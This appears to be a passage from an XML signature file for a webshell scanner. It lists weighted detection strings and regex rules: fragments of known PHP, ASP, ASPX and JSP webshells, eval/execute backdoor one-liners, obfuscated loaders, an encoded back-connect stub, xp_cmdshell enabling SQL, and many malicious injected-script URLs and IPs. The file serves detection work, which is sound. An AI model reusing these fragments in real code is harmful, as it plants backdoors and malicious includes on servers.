<ITEM><STR>if(!defined(</STR><NUM>20</NUM></ITEM>
<ITEM><STR>if (!defined('THINK_PATH')) exit()</STR><NUM>70</NUM></ITEM>
<ITEM><STR>= microtime(TRUE);</STR><NUM>30</NUM></ITEM>
<ITEM><STR>www.nusphere.com</STR><NUM>70</NUM></ITEM>
<ITEM><STR>$code_generated = new $_GET['code']($_GET['t'],$color_black</STR><NUM>70</NUM></ITEM>
<ITEM><STR>http://php.net/manual/ru/function.exec.php</STR><NUM>70</NUM></ITEM>
<ITEM><STR><![CDATA[<!--#include virtual="/ucenter/config/md5.asp"-->]]></STR><NUM>50</NUM></ITEM>
<ITEM><STR>->"e"."v"."a"."l"'=>'"e"."v"."a"."l"',</STR><NUM>70</NUM></ITEM>
<ITEM><STR>->webshell'=>'webshell',</STR><NUM>70</NUM></ITEM>
<ITEM><STR><![CDATA[
shellcode[]= <br>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
]]></STR><NUM>70</NUM></ITEM>
<ITEM><STR>response.Write(987651234-123498765)</STR><NUM>70</NUM></ITEM>
<ITEM><STR>Znothis(</STR><NUM>70</NUM></ITEM>
<ITEM><STR>private $webscan_upload="http://upload.webscan.360.cn/index.php";</STR><NUM>70</NUM></ITEM>
</whitelist>
<DELETE>
<threshold>70</threshold>
<ITEM>
<STR>JFolder.jsp</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>String k8cmd = new String(binary)</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>private Statement _dbStatement</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.baidu.com/img/baidu_logo.gif</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>tophack.net</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>langouster_udf.dll</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>public int TdgGU</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>public STRing vbhLn</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>actall{background:#F9F6F4;font-size:14px;border</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>DDOS</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$back_connect</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>Server.ScriptTimeout=99999999</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>aspmuma.net</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>h4ck2b.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ASPsSsy</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>lpl38.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>WwW.MumaSec.TK</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>QQ:185256496</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ASPXSpy</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$password</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>UserPass</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>shellname</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>zjjv.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>i0day.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$admin['pass']</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>$admin['cookiepath']</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>syw.i11.cc</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.4ngel.net</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>Loader'z WEB Shell</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>90sec.org</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>21,80,135,139,445,1433,3306,3389,</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.66dy6.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>moonudf.dll</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>\Control\Terminal Server\Wds\rdpwd\</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>b374k-shell</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>unlink("90sec.php")</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>qq:80925010</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>baiduqcsf</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>sf.78pa.com/a.js</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>N3tshell</STR>
<NUM>65</NUM>
</ITEM>
<ITEM>
<STR>backconn</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<title>PHPJackal]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[2409170736</title>]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<?php echo $this->smarty_insert_scripts</title>]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>function WSOstripslashes</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>function wsoLogin()</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>function WSOsetcookie</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>www.e23069.com/js1.js</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>moguiruanjian.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>eWFob298Z29vZ2xlfGJhaWR1fHNvc298c29nb3V8YmluZ3x5b3VkYW98c29vdWxlfGVhc291fHlpc291fGppa2V8eXVueXVu</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>KJ021320</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>String path=request.getParameter("path")</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>String content=request.getParameter("content")</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>String Pwd</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>System.getProperty("os.name")</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>System.getProperty("os.version"</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>System.getProperty("os.arch")</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>array('files'=>'utils.js,transport.js'</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ttfc.v5cx.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>FormColorBorder="#600000"</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>AmSize="11px"</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>menuColor="#111"</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>mName="</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>SiteURL="</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Copyright="</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>AD="</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>$sess_cookie = "cyb3rvars";</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http-equiv=MSThemeCompatible</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>rel=stylesheet type=text/css href=</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>http://www.fa56888.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[119489998</title>]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[LANGUAGE = VBScript.Encode</title>]]></STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[UserPass=</title>]]></STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>GIF89a</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<%eval request]]></STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>request("maniandajiok")</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<%execute(request]]></STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>Connection GC(String s)throws Exception{String[] x=s.trim().split</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>3vww7f6dscedrt0dktbx2rqx5fh9tjdjpg71byr5th6tsbpulbb8gmg3</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<title>JspDo Code By Xiao.3]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>String PW_SESSION_ATTRIBUTE = "JspSpyPwd"</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<title>string vbhLn="ASPXSpy"]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>1.81949.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.cc0777.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ttwg.pw/mb/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<?php @eval($_POST]]></STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<?eval]]></STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<!--qq5592774 -->]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>0x4D5A90000300000004000</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>853422.134209.20la.com.cn</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.0057888.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$infile22 = $folderpath . "page_22.html";</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>$infile21 = $folderpath . "page_21.html";</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>$infile20 = $folderpath . "page_20.html";</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<TITLE><?php echo $SFileName ?></TITLE>]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www6661222.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>255667.com/mb/public/css/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>zzelle.com/mb/public/css/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>FileWriter jshell = null</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<title>WWW.XXDDOS.COM</title>]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ack_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPW</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<?php eval($_POST[]]></STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>767002.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR> JFIF </STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>bc057.com/css/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>String strThisFile="JFileMan.jsp"</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5])</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>string='e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[<title> Envl PHP Shell]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>// * for any hostname (remember: /setvhost</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[var $config = array("server"=>"]]></STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.828777.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>955947.com/mb/2.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>23.245.198.139:88/files/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>\n{ n{7\l{ry}]rvnx~}FBBBBBBBBB</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>97a103a101a110a116a61a114a101a113a117a101a11</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>public br,ygv,gbc,ydo,yka,wzd,sod,vmd</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>21,23,25,79,80,110,135,137,138,139,143,443,445,1433,3306,3389,43958</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.asp&host="&host_name&"&directory="&Branch_directory]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.php&host=".$host_name."&directory=".$Branch]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>cr88888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$request_content=GetHtml($Remote_server.'/</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>$arrChar = '012qwertyuiopasdfghjklzxcvbnm3456789';</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>http://www.5738888.com/js/ad2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://odayexp.com/h4cker/mmgx/</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067</STR>
<NUM>70</NUM>
</ITEM>
</DELETE>
<language>
<processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor>
<threshold>70</threshold>
<WEBSHELL>
<ITEM>
<STR>gif87a</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>Then Execute(Session("lcx"</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>Response.Write(eval(Request.ITEM</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>GetObject("IIS://127.0.0.1/W3SVC/"</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>By Marcos</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>chopper</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>HYTop.mdb</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>C:\\Progra~1</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Servu</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>LyfUpload.UploadFile</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>cmd.exe</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>ServerVariables("SERVER_SOFTWARE")</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR>Environment.GetLogicalDrives</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>Evilspy</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>GetObject("WinNT://</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>webshell</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>WebAdmin2Y.x.y("add6bb58e139be10")</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>lake2</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>.GetFolder(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Password</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>UserPass</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>VBScript.encode</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>.CreateTextFile</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>ipconfig -all</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>kj021320</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>unhonker.com</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>xiaf.info</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>22dm.net</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>cmd.exe /c</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>RegEdit.exe /e</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>/bin/sh</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>net user</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>STRing jksessionpass</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>ASPYDrvsInfo</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>.CopyFolder</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR>.deletefile</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>.ComputerName</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>.CopyFile</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR>LocalAdminiSTRator</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Serv-U</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>System.Environment.SystemDirectory</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>System.Net.Sockets</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>System.Diagnostics</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>System.DirectoryServices</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>System.ServiceProcess</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>new Socket(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Runtime.getRuntime(</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>xp_cmdshell</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>Microsoft.XMLHTTP</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR>System.Reflection.Assembly.Load(Request.BinaryRead</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>WScript.Shell</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>FileOutputSTReam</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>72C24DD5-D70A-438B-8A42-98424B88AFB8</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>13709620-C279-11CE-A49E-444553540000</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>093FF809-1EA0-4079-9525-9614C3504B74</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>F935DC26-1CF0-11D0-ADB9-00C04FD58A0B</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>0D43FE01-F093-11CF-8940-00A0C9054228</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>Scripting.FileSystemObject</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>ADODB.STReam</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>BackDoor</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>command.com</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>uploadvirus</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>s;xvj4kjmx}4LkYMb@#@&?4kUlU6(L/D.P{PI2sl1+v?4kjC</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>hack.cctve.cn</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>fuckanquangoutezheng</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>OleDbConnection(session("DBC")) inSTR(DB_CSTRing.Text,":\")</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>sk8t9hSDALYDYBi0HCaGRxSgH5KgABYDYBg4Q</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>crypt_PRO="0mWm2/,5</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>WICXlQa33rNDnBUKHvXcMsQmWDL4e</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>#@~^k0oAAA==@#@&D]kJ@!tYsV@*@!</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$adminport=43958;</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>SessionName="ASPXSpy";</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>-SETDOMAIN"&vbcrlf&"-Domain=cctv|0.0.0.0|43859|-1|1|0"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>ShowFolder("C:\\RECYCLER</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://127.0.0.1:"&port&"/goldsun/upadmin/s1</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Addxp_cmdshell(SQL2005)</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>awen asp.net webshell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>void cmdExe_Click(object sender, System.EventArgs e)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>AK-74 Security Team Web Shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;\</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Rp=Co&"?pw="&Server.URlEncode(Request("jl"))&"&ib="&Request("ib")</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>1902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B19</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>s"&"cri"&"pting"&"."&"Fil"&"eSy"&"stemO"&"bject</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>spider,robot,Baidu,Google,360spider,sogou,soso</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>googlebot|baiduspider|sogou|yahoo|soso</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>,"baiduspider","yahoo! slurp","inktomi","msnbot","</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>bfafsfef6f4f_ffdffeffcffoffdffef</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")</STR>
<NUM>80</NUM>
</ITEM>
<RULE>
<ITEM>[^\w](Eval|eval|Execute|execute|Eval_r|ExecuteGlobal).{0,3}(UnEncode|request|Request|session|Request.Item|Request.form|Session)(\(|\[)[^\{\}]{0,22}\)</ITEM>
<ITEM>^gif89a</ITEM>
</RULE>
<ITEM>
<STR>/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>"D","7","S","O","q","G","j","l","z","4","L","k","m","x","0","c","v"</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>97a103a101a110a116a61a114a101a113a117a101a115a116a46a115a10</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>
<![CDATA[
<%a=request("x")%>
]]>
</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA["&Branch_directory_11&"."&Branch_directory_12&"."&Branch_directory_13&"."&Branch_directory_14&"."&Branch_directory_15&"."&Branch_directory_16]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>==^#~@</STR>
<NUM>20</NUM>
</ITEM>
</WEBSHELL>
<INFORMATION>
<ITEM>
<STR>new Socket(AddressFamily.InterNetwork, SocketTyp</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>DDosAttack</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>Attack_Get()</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Attack_Post()</STR>
<NUM>10</NUM>
</ITEM>
</INFORMATION>
<SEO>
<ITEM>
<STR>.1188588.com/mb/js1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>1.81949.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>23.245.198.139:88/files/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>255667.com/mb/public/css/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>51yes.com/click.aspx?id=214346876</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>767002.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>8kyule.com/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>94v587.com/include/js/hz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>955947.com/mb/2.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>api.discuz.com.de/bet.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>cr88888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http%3A//www.go0qle.com/zq.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2E%62%65%74%30%30%31%2E%63%6F%6D/%61%64/%73.%67i%66</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2E%6A%78%31%34%30%2E%63%6F%6D/liu/jc/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2e%74%74%72%64%79%2e%63%6f%6d/%73%65%6f/%6c%68/mao/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2e%74%74%72%64%79%2e%63%6f%6d/%73%65%6f/sf/2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://001sx.com/tz/zqad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://0913web.com/cpc3.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://1.81949.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://11.988947.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://112.213.126.202/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://162.217.172.14:60/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://184.22.155.137:100/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://184.22.4.27/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://19821024.com/mydown.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://23.245.198.138:88/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://23.245.198.140:88/haha/t.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://23.88.85.201/by/zs.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://23678.net/lh/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://3.cr88888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://3.ttleba.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://400378.com/boc/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/js/zz/sc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/js/zz/sc2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/lun/tan.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/lun/tan2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://61.194.40.116/docs/images/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://666.sa8999.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://777.sa8999.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://955947.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://966947.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://bc.088234.com/muban/js.js</STR>
<NUM>70</NUM>
